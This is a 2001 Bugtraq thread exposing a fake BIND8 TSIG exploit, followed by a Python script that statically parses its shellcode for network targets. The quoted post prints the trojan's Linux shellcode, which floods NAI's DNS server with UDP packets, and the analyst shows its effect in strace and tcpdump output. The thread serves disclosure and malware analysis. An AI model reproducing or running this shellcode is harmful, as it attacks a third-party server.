Here is more detailed information about the "trojan" bind8 exploit posted
to Bugtraq.
When you run the alleged tsig exploit it actually manages to run the Linux
shellcode on the local system (in my environment I used a Redhat 6.2
install in VMware (local network only)).
The exploit forks, sends something to your actual target (appears to be a
*nonworking* remote exploit for bind) and in the child process floods
dns1.nai.com without mercy:
...
fork() = 614
[pid 612] getpid() = 612
[pid 612] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 612] sendto(3,
"\2d\204\0\0\1\0\0\0\0\0\1\0\315\200\203\304\10=\4\0\30"..., 512, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("23.23.23.23")}}, 16) = 512
[pid 612] socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
[pid 612] connect(4, {sin_family=AF_INET, sin_port=htons(31338),
sin_addr=inet_addr("23.23.23.23")}}, 16 <unfinished ...>
[pid 614] time(NULL) = 981004491
[pid 614] socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) = 3
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
[pid 614] sendto(3,
"/sh\0\0\3537^j\21j\2j\2jf\215\5a\0\0\0\315\200\211\302"..., 1024, 0,
{sin_family=AF_INET, sin_port=htons(53),
sin_addr=inet_addr("161.69.3.150")}}, 16) = 1024
...
(lots more sendto()...)
This is how those flood packets look with tcpdump:
x.x.x.x.4691 > 161.69.3.150.53: 12147 updateMA [14174a] [235q] [27153n]
[27138au] (1024)
There's lots of them. This is bad depending on your like/dislike of NAI
and/or law enforcement.
Drop that code and step away from the Internet!
Max
>Date: Wed, 31 Jan 2001 20:57:54 -0800
>To: [EMAIL PROTECTED]
>From: Max Vision <[EMAIL PROTECTED]>
>Subject: That BIND8 "exploit" attacks NAI
>
>Hi,
>
>Please beware of running code such as this. It will do its best to
>attack NAI's nameserver. It's a typical, though well disguised, shellcode
>trick.
>Look in the Linux shellcode:
>\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
>
>More details after I have a better look...
>Max
>
>At 04:12 PM 1/31/2001 -0700, you wrote:
>> >From Anonymous <[EMAIL PROTECTED]> Wed Jan 31 18:06:24 2001
>>Date: Thu, 31 Jan 2001 18:06:19 -0400
>>From: Anonymous <[EMAIL PROTECTED]>
>>To: [EMAIL PROTECTED]
>>Subject: Bind8 exploit
>>Message-ID: <[EMAIL PROTECTED]>
>>Mime-Version: 1.0
>>Content-Type: text/plain; charset="us-ascii"
>>X-Mailer: Internet Mail Service (5.5.2650.21)
>>
>>
>>/*
>> * Implements TSIG buffer mismanagement overflow for incorrect
>> signatures. That
>> * one was really nice bug!
>> * Thanks NAI for nice bug!
>> */
>>
>>/* zeroes in all shellcodes are allowed - we encode them anyway.. */
>>char linux_shellcode[] = /* modifyed Aleph1 linux shellcode to
>> * bind to tcp port 31338. hey aleph1
>> * :) */
>>"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
>>"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
>>"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
>>"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
>>"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
>>"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
>>"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\0";
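The check Max describes above (spotting the hard-coded NAI address in the shellcode before anything is run) can be done mechanically. The Python below is an added example and not part of the thread; it only parses the bytes of the quoted linux_shellcode[] array, never executes them. It scans for two i386 Linux memory layouts: the three little-endian dwords passed to socket() through socketcall(), and a struct sockaddr_in (AF_INET as a little-endian short, the port in network order, then four address bytes). The filters that drop port-0 and non-unicast windows are my own heuristic to suppress hits from ordinary code bytes. In this sample the data block that the jmp/call/pop-esi prologue hands to the code starts at offset 0x3b, so the two functions recover exactly the socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP) call and the 161.69.3.150:53 destination seen in the strace output, and nothing resembling the "bind to tcp port 31338" that the comment claims.

```python
import struct

# Shellcode bytes copied verbatim from the quoted post's linux_shellcode[] array.
# They are treated purely as data here; nothing in this script executes them.
SHELLCODE = (
    b"\xeb\x34\x5e\xbb\x01\x00\x00\x00\x89\xf1\xb8\x66\x00\x00\x00\xcd"
    b"\x80\x89\x46\x14\x8d\x46\x30\x89\x46\x18\x31\xc0\x89\x46\x20\x8d"
    b"\x46\x0c\x89\x46\x24\xb8\x66\x00\x00\x00\xbb\x0b\x00\x00\x00\x8d"
    b"\x4e\x14\xcd\x80\xeb\xef\xe8\xc7\xff\xff\xff\x02\x00\x00\x00\x02"
    b"\x00\x00\x00\x11\x00\x00\x00\x02\x00\x00\x35\xa1\x45\x03\x96\xff"
    b"\xff\xff\xff\xef\xff\xff\xff\x00\x04\x00\x00\x00\x00\x00\x00\x02"
    b"\x5f\x9a\x80\x10\x00\x00\x00/bin/sh\x00"
)

AF_INET = 2
SOCK_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS = {0: "0", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def find_sockaddr_in(blob):
    """Return (offset, ip, port) for every 8-byte window that looks like the
    start of a struct sockaddr_in on i386 Linux: sin_family == AF_INET as a
    little-endian short, sin_port as a big-endian (network order) short,
    sin_addr as four raw bytes.  Windows with port 0 or a first octet
    outside the unicast range are dropped; that filter is a heuristic
    (assumption) to keep ordinary code bytes from showing up as hits."""
    hits = []
    for off in range(len(blob) - 7):
        family = struct.unpack_from("<H", blob, off)[0]
        if family != AF_INET:
            continue
        port = struct.unpack_from("!H", blob, off + 2)[0]
        addr = blob[off + 4:off + 8]
        if port == 0 or not 1 <= addr[0] <= 223:
            continue
        hits.append((off, ".".join(str(b) for b in addr), port))
    return hits


def find_socket_args(blob):
    """Return (offset, domain, type, protocol) for each run of three
    little-endian dwords that form plausible socket(2) arguments laid out
    in memory the way i386 socketcall(SYS_SOCKET, args) expects them."""
    hits = []
    for off in range(len(blob) - 11):
        domain, stype, proto = struct.unpack_from("<III", blob, off)
        if domain == AF_INET and stype in SOCK_TYPES and proto in PROTOCOLS:
            hits.append((off, "AF_INET", SOCK_TYPES[stype], PROTOCOLS[proto]))
    return hits


def report(blob):
    """Human-readable summary of both scans, one line per finding."""
    lines = []
    for off, dom, st, pr in find_socket_args(blob):
        lines.append(f"+{off:#06x}: socket({dom}, {st}, {pr})")
    for off, ip, port in find_sockaddr_in(blob):
        lines.append(f"+{off:#06x}: sockaddr_in -> {ip}:{port}")
    return lines


if __name__ == "__main__":
    for line in report(SHELLCODE):
        print(line)
```

The same two scans work on any shellcode blob pasted from a list: a connect-back or flood payload has to carry its destination somewhere, and on 32-bit Linux that destination almost always sits in memory in exactly this sockaddr_in shape, so the scan is a cheap first look before anyone considers assembling or stepping through the code.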